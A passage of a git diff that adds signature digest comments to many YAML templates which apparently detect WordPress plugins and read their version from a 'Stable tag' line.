+46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100af88c828d03f964a437e682d601da0dce193883686c7b11a6163a2193941c1320221009f8ebe8ca9527d685cb6e79391d288f0499c4f6d2e2199a823dc749351c98ab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..fdd2094c57 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220330a06b339661cbb2fcbf21ecb3d1542422250b681b2a44b253534a8d50295b8022069a22fd1111fbaf46bea99c88ef2994ded9dac26e7780479684890cc30d122e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..8741ad7ed6 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203e580ff9b1da5dff9865cd26c3c18c3512cd7d11f31fbf2c8a466cb80d6f4215022024a26da1bb55145ab16d5449a097add134a8c1a505074b706b0de9850a5466ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..0e3824c755 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e06edea40e98ef7061a9b637bcfa7e5cc40a07675e3d74d6c2b062a030122a9502203ca8cf63db1021ea1ad11ccd6c1ba9b90bfb94d07b8c8e0f5369cea9f36c9720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..c57f74ed24 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fb2dfe074c6faaba14cefec61bfe5b031abc9236170cfce03ae39d5d02bf1f85022100b73c62fcba3f0a02097607646113d9a0bba0a01708f53ca7677fe5206ee551bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..a7546af792 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022006586853b3f28f59b84cca482b27e95a93104393378d534ff446ca3eab22026402204700e5f5935a4708bcff3e9972eba950c410efa06ea18d6e8dc8ec4da0590a06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..a758a7b9b7 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200bc4711057301ad5e3489bc6040cb6a81dda5f62915d496246c91fd42384930702205702118d2915161fd3238c5eaab9214550133c720d927f4f16b5d563dea5ffe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..7727009724 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022045cb152d4f2c5a139e764b3214bcf2cd8ea2dfc18af43a9ec21795b3ab8eb2e5022100800d9e0e2690106347ff19fd9597407ed2ff3347349d00fd04c0ca4d19482f67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..791489f222 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022005cc9151e736fdc4d8d799e4549fc90d41550f171c0397593605a43290b3dffe022100c6e9fcee8b18f66fc53a8e31fcc6987483bb27d2b0b7bac301cb68734a2014ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..f6e3d96d68 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201240286dd418ed6fdc7bb61cab6d92ff63257fc97af5577c2b5ae77cb3c7ec6e022100b6126a9432ad483e8bd2b327e57fa0ab8caba19c1a6faaf641e3dbb7d9acef6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 4f99876557..0abe1885cc 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ce0edbd22a4522d395f4988c4137c18678a72bc6c080adb8f9e4e2c97eb64b6002210098ade1dfc694a99a9d4956a861ec514f05eda42cc38cac3ff069c7dc5d137c40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..c3cd142e98 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eb739e3f61d0efc446cc14657bc109ba85a1ddff850ea3a905a67c7230944914022100fde55388157dbc67ce2128fc49000674db8fc66df96d467fdcfae91444f3ee8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..90011f960f 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220270ede3fc209d28a18920fb4ac9e5b19131d0c7c865cdc01576ee8bb96de0339022008114b4bd9d83897c73ec10e1a4f7f41b5ef3439c653b613a97c07686a61016a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..84a856a099 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004758cacd94489c539df7bcd3fa1626ba6c7cd3a80509dff7e89e5ca4ed7d5c502204784402b1772c9a40fce7910c677989c1a608c98fffbad50ab1a5a1c66ca69c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..635fb19875 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220075eddd198a0e36b8253c2853a629da597e1ec9d9532a9759620e26b2a0842fa022100d0fc034643c5bfaa10382514ffaf8550d37aa30a4d26795b9d97c09a333d5e2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..4af16d3b0f 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100901ed9e2e7d9090a0d11a0ffa2dc0058db094186164ec0d52df1a65a44b5429d02202189bcb35d05b0cf6e4154bf86a19c815d89e016f4a2f64f99b437adef855e2e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..71b7a1fac1 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022009778dc77478fda302087a3b8a3928fd9fd9741d0bb3f5cf06f2de6564e89c900220245e362e470823f780c04dbb3c5a4443116229d7b1c91b4b78d1d525d96e89f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..085d12dc8e 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a3203e41cbba3d79e0410296ee7f1c47d8c5bbfe085c4ec0be07b487705f20580221009ce7d65e926377893ff1f7f2678a33ea0f01576e6fa3c381b004d77c7de2b6f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..b9430b59f7 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d3fb31865bc72141cf6695f32894fd1d53da915ceb5431de53a8fc6d840511370221009e9f081a0791d77a9a13aa61715cbb72f7c48e3be8a99856785bf0c070b65c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..71b294dd1e 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a6d9fd9729d4b3b64852279b3ea26c973dc6e958eb1b5048200f343775569766022069a07e0e767effbc94172af84a0c1f97b2df2d0409621c52639186d315156ff5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..698f292a30 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d58baac329ad5c2525350762b8eec79ffd12745982bf349a8cf51084f251ede7022100e32af8c540c06545560dfe6f3c6e17e1696e1f440fb01dfa5b20a0aec29f80a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..839fec392b 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058064a1380d09a7011f2f8bfa6c2db90e74c78b771d54948a92203385d4e903902203a625454bd115d8aa2220cdb76246040c54f1c718e18029b9ef0eb923959a3de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..ee3fa03a90 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206dbf07c20ccf5e4bef1188ef88ad106e9fd5c612b2917a5df8f1b6e2357a86f202210085f1d62ea08fd25b082c70666819a6b2fa1c2223ed9417e0d491685e9990e647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..f8e281f754 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d8ac0e4787f89fb616f5d9a4daafd84a07781729e74b2417c763b41f139a60d402200c90557ce4bfef2997837ec772da38b08174f9253a38106f406dc765bdb2c2cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..1f879e78e6 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205d93517d7c215de754410cb9054622d58905138a8f5e5de9bed51c3ed6f7666a02203bfcb94e3a1eea8290be9f7ddf17642210d7aaaf65c03ac19e73ec7e911ec93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..534a21bf08 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100936afa94d5a429befd8a0cde5de2cbeba7d589e094c23379093f6f13fd3b6e500220085a2c7bec046909690810b3cc3b6cb8a297e29be535716a8c65b31bd10c03fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..6a2e72e587 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204b87b73b59388bd022c9270b1f828356702b9ae56f5ac4aa7843fc80e73cf7cc02210094144d40cd71b83aeb66d6ed3621010400200880fdc9042b2432be04cfd7b3ca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..d030872716 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022013d8fddcc5cdaedf056d997761c070e64f5e1b456d4ee8db2792bbbffa77c41802202a6a2d7caa4a13677fb0f9c4f93c2ae332e8616b4022d58e719581753b60512c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..b12cba79aa 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210098195456c473bf80ae789fd88c5b5e5dd429b9a4bdcd1a00be1d976ab58087a902205b3bf4038eed8b62bbab25d37ab375d0722fdfbca5431ecb4360b7f803b8e4ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..7c795fb91b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cc7481de420c297ccf7cc2e35c526bfb9b3c506756a6d1fe69fdba2a8ccc1c6202205b319610857e97d7f3edaab8821ebe57bf713a8f10763e2dd541a12f80856f66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..c805a86901 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210080cb6e5ba322ba0fd7af372761c8226ff4125bb9ff73c6bec8c6bcb5d4793aa5022021ceef476c67474c6d766fbd08e2869fec2c31e34e497ceb64f5faf28c42126e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..ba575aeb3f 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028d8a68ebbb1a7285b11bb4644d2002a7c554d9077af336e021d9654917b3068022100f8e9eb0ff4ec20f403cdaab60e184570601248fca3366462717af87ba77c26d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..39286e5720 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205590495c7b1f3c28c5d7db184ee71fe1a24b7061a303d5ea116928e10b895d6f022100e06dc55d37597e81e26987cc22fa388bccb61df6d614ca3a264741d7b741b751:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..2187640d4e 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205e55d95924c19f904903500af60c51133f49bdc61783a130cdbc12b692dcb61c022100e87dfc5e85eb4ac01ec7fa4f21f4368954e68674e554d854d739f45786f870bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..f985f3ed49 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022066c83c2e2422dd7154d2dbe7c3ec9df52e6744c90e8cf86dbcbe344b4b333eea022100c5176fddbae79ca8be66f6b48928e9a41b472591e579c66a7026e70b7ecf4bba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 286dfdaec6..55de4be9ac 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202af6f9f9b46718eefee31d4b1ddfbfbf4f755cb1491090dd8601d0c07b852734022100ca20628dec6a6ad748d403c0fa92b1bd4831d456efc8ad9a101a60d5a2539c0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..86c12ed6a5 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e15e5634e385ba51c95ed8017dc93eb6ce911fa082608b6d8b76efc2fc31527302201d864919975a2eafb77f6d549018d73f98e2937583fca4d56eb0c94e61c92309:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..550f9c2fd9 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206eee87e086f4ff8bc198c68070b2769411734b3a14cc2fbd593448c4bcdeee9e022100a1852116769bd3bde1fa4e471a8b29733f95162c155558c24d613d0f1039d5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..27461c1483 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207f024335a785cd2181cd59699eaf6f24b6caa21ff8c52f2cbe3e4cca48d75577022100b0f3336db2bc3b64f880825b2fb8d166f42a0aa7fdce094cf4add635904c3399:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..7a264fcc8e 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b7959534dd5604d486d358947b7f0d912dbd24ac4c8d8d68db4b7579a9b519a3022100a70e554b09de7e9bd88a2667d7fa5c346fb597676eddc3d442f947cb77e0d6f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..7d6caffd1f 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207ae0db23ed6fe3bf1b70569ef8ee6a5f1c3619511a99afc487b93dd899784e0a022036de37f62d4d0809d3b1bed2c6d8dd0bfc90d4f13000796eb9f2e24a6586ffdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 2b29428cf1..3888677058 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4cba128c5f88a3c5f2a99b38ddd84df85ee8300a55d39223f33337aae515286022100f0e7478c17a7575e0388b1fb44f88df7ef83dc08a1805f71e4ecec5cec0a8738:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..cb6903a96c 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d34e37056edce60b39ffdb80ea0cf44382abec7e6017e5f2a107f3648fa821bc022100a9ad598b2cc2e51df9c629405d4046167caf896df3dfbc90e070597bfa2869eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..bdabf53edc 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402205dd8c64823fc2750daa45cdb492eb5ca5e734f29d4b5f028d3db713e546d099a02201793a05bd1a95719fbbdb37631c9160102cb3d635d7ed1fad2eeec0e44b269c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..15e4b7583d 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d625362832b4b8b7dcbbd81a85f36eb974590371c6f427ec88c48579a9b58850022100d98907b440fa0aa81fcf7630bd3bd80f9ac4b95ce3c13cae2a87ceee45dc812e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..fb7c3bdb94 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023649d859a6f0230a3a87a1ff7f75f3cb267b9b6e586d98cbd06f68b7150090c02201de0cf8ebd944ae40420b620ff4a43f0c8d265828df0cc2ba948d2142d34a6a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..2e9295d78c 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d7c38336139fbf06d9275e71792446baa3a15e313d0a839c184860102cc7597022000f6bfc3d372ca9c5b5c5a4a6ed72f1e3db858f973fae568fa023ec9f8c23491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..802b39afeb 100644 --- 